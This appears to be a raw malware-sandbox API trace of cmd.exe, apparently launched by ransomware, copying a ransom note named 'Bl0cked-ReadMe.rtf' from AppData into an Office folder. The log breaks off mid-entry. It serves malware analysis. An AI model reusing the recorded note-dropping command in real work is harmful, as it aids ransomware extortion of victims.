os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 22341 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 22342 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 22343 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 22344 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 22345 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 22346 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 22347 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 22348 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 22349 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 22350 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 22474 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 22475 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 22476 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 22477 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 22478 start_va = 0x560000 end_va = 0x56ffff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 22479 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 22480 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 22481 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 22482 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 22483 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 22484 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 22485 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 22486 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 22487 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 22488 start_va = 0x1c0000 end_va = 0x287fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 22489 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 22490 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 22491 start_va = 0x290000 end_va = 0x296fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 22492 start_va = 0x2a0000 end_va = 0x2a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 22493 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 22494 start_va = 0x3c0000 end_va = 0x4c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 22495 start_va = 0x4d0000 end_va = 0x4d0fff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 22496 start_va = 0x570000 end_va = 0x116ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22497 start_va = 0x1170000 end_va = 0x12d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001170000" filename = "" Thread: id = 343 os_tid = 0x81c [0162.621] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14ff5c | out: lpSystemTimeAsFileTime=0x14ff5c*(dwLowDateTime=0x9a4d60c0, dwHighDateTime=0x1d440a9)) [0162.621] GetCurrentProcessId () returned 0xfe8 [0162.621] GetCurrentThreadId () returned 0x81c [0162.621] GetTickCount () returned 0x31479 [0162.621] QueryPerformanceCounter (in: lpPerformanceCount=0x14ff54 | out: lpPerformanceCount=0x14ff54*=21940986948) returned 1 [0162.621] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0162.621] __set_app_type (_Type=0x1) [0162.621] __p__fmode () returned 0x76b331f4 [0162.622] __p__commode () returned 0x76b331fc [0162.622] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0162.622] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0162.622] GetCurrentThreadId () returned 0x81c [0162.622] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x81c) returned 0x38 [0162.622] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0162.622] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0162.622] SetThreadUILanguage (LangId=0x0) returned 0x409 [0162.622] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0162.622] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14feec | out: phkResult=0x14feec*=0x0) returned 0x2 [0162.623] VirtualQuery (in: lpAddress=0x14ff23, lpBuffer=0x14febc, dwLength=0x1c | out: lpBuffer=0x14febc*(BaseAddress=0x14f000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.623] VirtualQuery (in: lpAddress=0x50000, lpBuffer=0x14febc, dwLength=0x1c | out: lpBuffer=0x14febc*(BaseAddress=0x50000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0162.623] VirtualQuery (in: lpAddress=0x51000, lpBuffer=0x14febc, dwLength=0x1c | out: lpBuffer=0x14febc*(BaseAddress=0x51000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0162.623] VirtualQuery (in: lpAddress=0x53000, lpBuffer=0x14febc, dwLength=0x1c | out: lpBuffer=0x14febc*(BaseAddress=0x53000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.623] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x14febc, dwLength=0x1c | out: lpBuffer=0x14febc*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0162.623] GetConsoleOutputCP () returned 0x1b5 [0162.623] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0162.623] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0162.623] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.623] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0162.623] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.623] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0162.623] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.623] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0162.624] _get_osfhandle (_FileHandle=0) returned 0x3 [0162.624] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0162.624] _get_osfhandle (_FileHandle=0) returned 0x3 [0162.624] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0162.624] GetEnvironmentStringsW () returned 0x2d01b0* [0162.624] FreeEnvironmentStringsW (penv=0x2d01b0) returned 1 [0162.624] GetEnvironmentStringsW () returned 0x2d01b0* [0162.625] FreeEnvironmentStringsW (penv=0x2d01b0) returned 1 [0162.625] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14ee5c | out: phkResult=0x14ee5c*=0x40) returned 0x0 [0162.625] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14ee64, lpData=0x14ee68, lpcbData=0x14ee60*=0x1000 | out: lpType=0x14ee64*=0x0, lpData=0x14ee68*=0xe8, lpcbData=0x14ee60*=0x1000) returned 0x2 [0162.625] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14ee64, lpData=0x14ee68, lpcbData=0x14ee60*=0x1000 | out: lpType=0x14ee64*=0x4, lpData=0x14ee68*=0x1, lpcbData=0x14ee60*=0x4) returned 0x0 [0162.625] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14ee64, lpData=0x14ee68, lpcbData=0x14ee60*=0x1000 | out: lpType=0x14ee64*=0x0, lpData=0x14ee68*=0x1, lpcbData=0x14ee60*=0x1000) returned 0x2 [0162.625] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14ee64, lpData=0x14ee68, lpcbData=0x14ee60*=0x1000 | out: lpType=0x14ee64*=0x4, lpData=0x14ee68*=0x0, lpcbData=0x14ee60*=0x4) returned 0x0 [0162.625] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14ee64, lpData=0x14ee68, lpcbData=0x14ee60*=0x1000 | out: lpType=0x14ee64*=0x4, lpData=0x14ee68*=0x40, lpcbData=0x14ee60*=0x4) returned 0x0 [0162.625] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14ee64, lpData=0x14ee68, lpcbData=0x14ee60*=0x1000 | out: lpType=0x14ee64*=0x4, lpData=0x14ee68*=0x40, lpcbData=0x14ee60*=0x4) returned 0x0 [0162.625] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14ee64, lpData=0x14ee68, lpcbData=0x14ee60*=0x1000 | out: lpType=0x14ee64*=0x0, lpData=0x14ee68*=0x40, lpcbData=0x14ee60*=0x1000) returned 0x2 [0162.625] RegCloseKey (hKey=0x40) returned 0x0 [0162.625] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14ee5c | out: phkResult=0x14ee5c*=0x40) returned 0x0 [0162.625] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14ee64, lpData=0x14ee68, lpcbData=0x14ee60*=0x1000 | out: lpType=0x14ee64*=0x0, lpData=0x14ee68*=0x40, lpcbData=0x14ee60*=0x1000) returned 0x2 [0162.625] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14ee64, lpData=0x14ee68, lpcbData=0x14ee60*=0x1000 | out: lpType=0x14ee64*=0x4, lpData=0x14ee68*=0x1, lpcbData=0x14ee60*=0x4) returned 0x0 [0162.625] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14ee64, lpData=0x14ee68, lpcbData=0x14ee60*=0x1000 | out: lpType=0x14ee64*=0x0, lpData=0x14ee68*=0x1, lpcbData=0x14ee60*=0x1000) returned 0x2 [0162.625] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14ee64, lpData=0x14ee68, lpcbData=0x14ee60*=0x1000 | out: lpType=0x14ee64*=0x4, lpData=0x14ee68*=0x0, lpcbData=0x14ee60*=0x4) returned 0x0 [0162.625] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14ee64, lpData=0x14ee68, lpcbData=0x14ee60*=0x1000 | out: lpType=0x14ee64*=0x4, lpData=0x14ee68*=0x9, lpcbData=0x14ee60*=0x4) returned 0x0 [0162.625] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14ee64, lpData=0x14ee68, lpcbData=0x14ee60*=0x1000 | out: lpType=0x14ee64*=0x4, lpData=0x14ee68*=0x9, lpcbData=0x14ee60*=0x4) returned 0x0 [0162.625] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14ee64, lpData=0x14ee68, lpcbData=0x14ee60*=0x1000 | out: lpType=0x14ee64*=0x0, lpData=0x14ee68*=0x9, lpcbData=0x14ee60*=0x1000) returned 0x2 [0162.626] RegCloseKey (hKey=0x40) returned 0x0 [0162.626] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886384 [0162.626] srand (_Seed=0x5b886384) [0162.626] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\Bl0cked-ReadMe.rtf\"" [0162.626] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\Bl0cked-ReadMe.rtf\"" [0162.626] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0162.626] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2d1910, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0162.626] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0162.626] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0162.626] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0162.626] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0162.627] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0162.627] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0162.627] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0162.627] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0162.627] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0162.627] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0162.627] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0162.627] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0162.627] GetEnvironmentStringsW () returned 0x2d2300* [0162.627] FreeEnvironmentStringsW (penv=0x2d2300) returned 1 [0162.627] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0162.627] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0162.627] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0162.627] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0162.627] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0162.627] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0162.627] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0162.627] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0162.627] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0162.627] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0162.627] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x14fc28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0162.627] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x14fc28, lpFilePart=0x14fc24 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x14fc24*="Desktop") returned 0x18 [0162.628] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0162.628] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x14f9a4 | out: lpFindFileData=0x14f9a4) returned 0x2d0040 [0162.628] FindClose (in: hFindFile=0x2d0040 | out: hFindFile=0x2d0040) returned 1 [0162.628] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x14f9a4 | out: lpFindFileData=0x14f9a4) returned 0x2d0040 [0162.628] FindClose (in: hFindFile=0x2d0040 | out: hFindFile=0x2d0040) returned 1 [0162.628] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x14f9a4 | out: lpFindFileData=0x14f9a4) returned 0x2d0040 [0162.628] FindClose (in: hFindFile=0x2d0040 | out: hFindFile=0x2d0040) returned 1 [0162.628] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0162.628] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0162.629] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0162.629] GetEnvironmentStringsW () returned 0x2d2b20* [0162.629] FreeEnvironmentStringsW (penv=0x2d2b20) returned 1 [0162.629] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0162.629] GetConsoleOutputCP () returned 0x1b5 [0162.629] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0162.630] GetUserDefaultLCID () returned 0x409 [0162.630] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0162.630] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x14fd68, cchData=128 | out: lpLCData="0") returned 2 [0162.630] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x14fd68, cchData=128 | out: lpLCData="0") returned 2 [0162.630] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x14fd68, cchData=128 | out: lpLCData="1") returned 2 [0162.630] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0162.630] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0162.630] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0162.630] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0162.630] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0162.630] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0162.630] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0162.630] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0162.630] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0162.631] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0162.631] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0162.632] GetConsoleTitleW (in: lpConsoleTitle=0x2c0900, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0162.632] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0162.632] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0162.632] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0162.632] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0162.633] _wcsicmp (_String1="type", _String2=")") returned 75 [0162.633] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0162.633] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0162.633] _wcsicmp (_String1="IF", _String2="type") returned -11 [0162.633] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0162.633] _wcsicmp (_String1="REM", _String2="type") returned -2 [0162.633] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0162.638] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.638] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.638] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.638] GetFileType (hFile=0x7) returned 0x2 [0162.774] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0162.774] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14fc60 | out: lpMode=0x14fc60) returned 1 [0162.774] _dup (_FileHandle=1) returned 3 [0162.774] _close (_FileHandle=1) returned 0 [0162.775] _wcsicmp (_String1="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0162.775] CreateFileW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x14fc30, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0162.776] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0162.776] GetConsoleTitleW (in: lpConsoleTitle=0x14fa60, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0162.777] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0162.777] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0162.777] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0162.777] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0162.777] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0162.778] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x14f5c4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14f5c4) returned 0x2c0eb0 [0162.778] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0162.778] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0162.778] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0162.778] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14e4d0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0162.778] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0162.779] _get_osfhandle (_FileHandle=4) returned 0x54 [0162.779] GetFileType (hFile=0x54) returned 0x1 [0162.779] _get_osfhandle (_FileHandle=4) returned 0x54 [0162.779] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x14e528 | out: lpFileSizeHigh=0x14e528*=0x0) returned 0x1632 [0162.779] _get_osfhandle (_FileHandle=4) returned 0x54 [0162.779] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0162.779] _get_osfhandle (_FileHandle=4) returned 0x54 [0162.779] ReadFile (in: hFile=0x54, lpBuffer=0x14f360, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e550, lpOverlapped=0x0 | out: lpBuffer=0x14f360*, lpNumberOfBytesRead=0x14e550*=0x200, lpOverlapped=0x0) returned 1 [0162.779] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.779] GetFileType (hFile=0x4c) returned 0x1 [0162.779] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.779] GetFileType (hFile=0x4c) returned 0x1 [0162.779] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.779] WriteFile (in: 